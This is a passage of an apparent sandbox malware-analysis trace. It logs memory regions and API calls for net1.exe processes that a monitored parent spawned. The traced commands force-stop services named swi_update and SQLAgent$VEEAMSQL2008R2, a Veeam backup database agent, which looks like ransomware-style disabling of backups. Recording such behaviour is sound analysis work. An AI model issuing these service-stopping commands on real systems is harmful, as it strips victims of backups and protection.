pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12908 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12909 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12910 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12911 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12912 start_va = 0xffb80000 end_va = 0xffbb2fff entry_point = 0xffb80000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12913 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12914 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12915 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 12916 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12924 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12925 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 12926 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12927 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12928 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12929 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12930 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12969 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12970 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 12971 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 12972 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12973 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12974 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12975 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12976 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12977 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12978 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12979 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12980 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12981 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12982 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12983 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12984 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12985 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12986 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12987 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13027 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 912 os_tid = 0xea4 [0120.783] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f910 | out: lpSystemTimeAsFileTime=0x24f910*(dwLowDateTime=0xfd1d7250, dwHighDateTime=0x1d48689)) [0120.783] GetCurrentProcessId () returned 0x474 [0120.783] GetCurrentThreadId () returned 0xea4 [0120.783] GetTickCount () returned 0x27d69 [0120.783] QueryPerformanceCounter (in: lpPerformanceCount=0x24f918 | out: lpPerformanceCount=0x24f918*=1816770100000) returned 1 [0120.784] GetModuleHandleW (lpModuleName=0x0) returned 0xffb80000 [0120.784] __set_app_type (_Type=0x1) [0120.784] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb99c9c) returned 0x0 [0120.784] __getmainargs (in: _Argc=0xffba4780, _Argv=0xffba4790, _Env=0xffba4788, _DoWildCard=0, _StartInfo=0xffba479c | out: _Argc=0xffba4780, _Argv=0xffba4790, _Env=0xffba4788) returned 0 [0120.784] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.785] GetConsoleOutputCP () returned 0x1b5 [0120.785] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffbacec0 | out: lpCPInfo=0xffbacec0) returned 1 [0120.785] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0120.810] sprintf_s (in: _DstBuf=0x24f8b8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.810] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.814] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.814] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0120.814] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_update /y" [0120.814] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f650, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0120.815] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.815] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f8a8 | out: Buffer=0x24f8a8*=0x64d50) returned 0x0 [0120.815] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f8a8 | out: Buffer=0x24f8a8*=0x6c0f0) returned 0x0 [0120.815] _fileno (_File=0x7fefdba2a80) returned 0 [0120.815] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0120.815] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.815] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.815] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.815] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.815] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.815] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.815] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.815] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.815] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.815] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.815] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.815] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.815] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.815] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.815] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.815] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.815] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.815] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.815] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.815] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.816] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.816] _wcsicmp (_String1="accounts", _String2="swi_update") returned -18 [0120.816] _wcsicmp (_String1="computer", _String2="swi_update") returned -16 [0120.816] _wcsicmp (_String1="config", _String2="swi_update") returned -16 [0120.816] _wcsicmp (_String1="continue", _String2="swi_update") returned -16 [0120.816] _wcsicmp (_String1="cont", _String2="swi_update") returned -16 [0120.816] _wcsicmp (_String1="file", _String2="swi_update") returned -13 [0120.816] _wcsicmp (_String1="files", _String2="swi_update") returned -13 [0120.816] _wcsicmp (_String1="group", _String2="swi_update") returned -12 [0120.816] _wcsicmp (_String1="groups", _String2="swi_update") returned -12 [0120.816] _wcsicmp (_String1="help", _String2="swi_update") returned -11 [0120.816] _wcsicmp (_String1="helpmsg", _String2="swi_update") returned -11 [0120.816] _wcsicmp (_String1="localgroup", _String2="swi_update") returned -7 [0120.816] _wcsicmp (_String1="pause", _String2="swi_update") returned -3 [0120.816] _wcsicmp (_String1="session", _String2="swi_update") returned -18 [0120.816] _wcsicmp (_String1="sessions", _String2="swi_update") returned -18 [0120.816] _wcsicmp (_String1="sess", _String2="swi_update") returned -18 [0120.816] _wcsicmp (_String1="share", _String2="swi_update") returned -15 [0120.816] _wcsicmp (_String1="start", _String2="swi_update") returned -3 [0120.816] _wcsicmp (_String1="stats", _String2="swi_update") returned -3 [0120.816] _wcsicmp (_String1="statistics", _String2="swi_update") returned -3 [0120.816] _wcsicmp (_String1="stop", _String2="swi_update") returned -3 [0120.816] _wcsicmp (_String1="time", _String2="swi_update") returned 1 [0120.816] _wcsicmp (_String1="user", _String2="swi_update") returned 2 [0120.816] _wcsicmp (_String1="users", _String2="swi_update") returned 2 [0120.816] _wcsicmp (_String1="msg", _String2="swi_update") returned -6 [0120.816] _wcsicmp (_String1="messenger", _String2="swi_update") returned -6 [0120.816] _wcsicmp (_String1="receiver", _String2="swi_update") returned -1 [0120.816] _wcsicmp (_String1="rcv", _String2="swi_update") returned -1 [0120.816] _wcsicmp (_String1="netpopup", _String2="swi_update") returned -5 [0120.816] _wcsicmp (_String1="redirector", _String2="swi_update") returned -1 [0120.816] _wcsicmp (_String1="redir", _String2="swi_update") returned -1 [0120.816] _wcsicmp (_String1="rdr", _String2="swi_update") returned -1 [0120.816] _wcsicmp (_String1="workstation", _String2="swi_update") returned 4 [0120.816] _wcsicmp (_String1="work", _String2="swi_update") returned 4 [0120.816] _wcsicmp (_String1="wksta", _String2="swi_update") returned 4 [0120.816] _wcsicmp (_String1="prdr", _String2="swi_update") returned -3 [0120.816] _wcsicmp (_String1="devrdr", _String2="swi_update") returned -15 [0120.817] _wcsicmp (_String1="lanmanworkstation", _String2="swi_update") returned -7 [0120.817] _wcsicmp (_String1="server", _String2="swi_update") returned -18 [0120.817] _wcsicmp (_String1="svr", _String2="swi_update") returned -1 [0120.817] _wcsicmp (_String1="srv", _String2="swi_update") returned -5 [0120.817] _wcsicmp (_String1="lanmanserver", _String2="swi_update") returned -7 [0120.817] _wcsicmp (_String1="alerter", _String2="swi_update") returned -18 [0120.817] _wcsicmp (_String1="netlogon", _String2="swi_update") returned -5 [0120.817] _wcsupr (in: _String="swi_update" | out: _String="SWI_UPDATE") returned="SWI_UPDATE" [0120.817] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6ce00 [0120.892] GetServiceKeyNameW (in: hSCManager=0x6ce00, lpDisplayName="SWI_UPDATE", lpServiceName=0xffba5750, lpcchBuffer=0x24f7c8 | out: lpServiceName="", lpcchBuffer=0x24f7c8) returned 0 [0120.893] _wcsicmp (_String1="msg", _String2="SWI_UPDATE") returned -6 [0120.893] _wcsicmp (_String1="messenger", _String2="SWI_UPDATE") returned -6 [0120.893] _wcsicmp (_String1="receiver", _String2="SWI_UPDATE") returned -1 [0120.893] _wcsicmp (_String1="rcv", _String2="SWI_UPDATE") returned -1 [0120.893] _wcsicmp (_String1="redirector", _String2="SWI_UPDATE") returned -1 [0120.893] _wcsicmp (_String1="redir", _String2="SWI_UPDATE") returned -1 [0120.893] _wcsicmp (_String1="rdr", _String2="SWI_UPDATE") returned -1 [0120.893] _wcsicmp (_String1="workstation", _String2="SWI_UPDATE") returned 4 [0120.893] _wcsicmp (_String1="work", _String2="SWI_UPDATE") returned 4 [0120.893] _wcsicmp (_String1="wksta", _String2="SWI_UPDATE") returned 4 [0120.893] _wcsicmp (_String1="prdr", _String2="SWI_UPDATE") returned -3 [0120.893] _wcsicmp (_String1="devrdr", _String2="SWI_UPDATE") returned -15 [0120.893] _wcsicmp (_String1="lanmanworkstation", _String2="SWI_UPDATE") returned -7 [0120.893] _wcsicmp (_String1="server", _String2="SWI_UPDATE") returned -18 [0120.893] _wcsicmp (_String1="svr", _String2="SWI_UPDATE") returned -1 [0120.893] _wcsicmp (_String1="srv", _String2="SWI_UPDATE") returned -5 [0120.893] _wcsicmp (_String1="lanmanserver", _String2="SWI_UPDATE") returned -7 [0120.893] _wcsicmp (_String1="alerter", _String2="SWI_UPDATE") returned -18 [0120.893] _wcsicmp (_String1="netlogon", _String2="SWI_UPDATE") returned -5 [0120.893] NetServiceControl (in: servername=0x0, service="SWI_UPDATE", opcode=0x0, arg=0x0, bufptr=0x24f7d0 | out: bufptr=0x24f7d0) returned 0x889 [0120.894] wcscpy_s (in: _Destination=0xffba80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.894] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0120.895] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffba5b50, nSize=0x800, Arguments=0xffba7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.896] GetFileType (hFile=0xb) returned 0x2 [0120.897] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f698 | out: lpMode=0x24f698) returned 1 [0120.897] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffba5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24f690, lpReserved=0x0 | out: lpBuffer=0xffba5b50*, lpNumberOfCharsWritten=0x24f690*=0x1e) returned 1 [0120.897] GetFileType (hFile=0xb) returned 0x2 [0120.897] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f698 | out: lpMode=0x24f698) returned 1 [0120.897] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f690, lpReserved=0x0 | out: lpBuffer=0xffb81efc*, lpNumberOfCharsWritten=0x24f690*=0x2) returned 1 [0120.898] _ultow (in: _Dest=0x889, _Radix=2422528 | out: _Dest=0x889) returned="2185" [0120.898] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffba5b50, nSize=0x800, Arguments=0xffba7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.898] GetFileType (hFile=0xb) returned 0x2 [0120.898] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f698 | out: lpMode=0x24f698) returned 1 [0120.898] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffba5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f690, lpReserved=0x0 | out: lpBuffer=0xffba5b50*, lpNumberOfCharsWritten=0x24f690*=0x34) returned 1 [0120.898] GetFileType (hFile=0xb) returned 0x2 [0120.899] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f698 | out: lpMode=0x24f698) returned 1 [0120.899] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f690, lpReserved=0x0 | out: lpBuffer=0xffb81efc*, lpNumberOfCharsWritten=0x24f690*=0x2) returned 1 [0120.899] NetApiBufferFree (Buffer=0x64d50) returned 0x0 [0120.899] NetApiBufferFree (Buffer=0x6c0f0) returned 0x0 [0120.899] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_update /y" [0120.899] exit (_Code=2) Process: id = "370" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x23564000" os_pid = "0x7d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "361" os_parent_pid = "0xb4c" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12931 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12932 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12933 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12934 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12935 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12936 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12937 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12938 start_va = 0xffb80000 end_va = 0xffbb2fff entry_point = 0xffb80000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12939 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12940 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12941 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 12942 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12962 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12963 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12964 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 12965 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12966 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12967 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12968 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13007 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13008 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 13009 start_va = 0x700000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 13010 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13011 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13012 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13013 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13014 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13015 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13016 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13017 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13018 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13019 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13020 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13021 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13022 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13023 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13024 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13025 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13028 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 914 os_tid = 0x478 [0120.801] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fdd0 | out: lpSystemTimeAsFileTime=0x26fdd0*(dwLowDateTime=0xfd1fd3b0, dwHighDateTime=0x1d48689)) [0120.801] GetCurrentProcessId () returned 0x7d8 [0120.801] GetCurrentThreadId () returned 0x478 [0120.801] GetTickCount () returned 0x27d78 [0120.801] QueryPerformanceCounter (in: lpPerformanceCount=0x26fdd8 | out: lpPerformanceCount=0x26fdd8*=1816771900000) returned 1 [0120.802] GetModuleHandleW (lpModuleName=0x0) returned 0xffb80000 [0120.802] __set_app_type (_Type=0x1) [0120.802] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb99c9c) returned 0x0 [0120.802] __getmainargs (in: _Argc=0xffba4780, _Argv=0xffba4790, _Env=0xffba4788, _DoWildCard=0, _StartInfo=0xffba479c | out: _Argc=0xffba4780, _Argv=0xffba4790, _Env=0xffba4788) returned 0 [0120.803] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.803] GetConsoleOutputCP () returned 0x1b5 [0120.812] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffbacec0 | out: lpCPInfo=0xffbacec0) returned 1 [0120.812] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0120.823] sprintf_s (in: _DstBuf=0x26fd78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.823] setlocale (category=0, locale=".437") returned="English_United 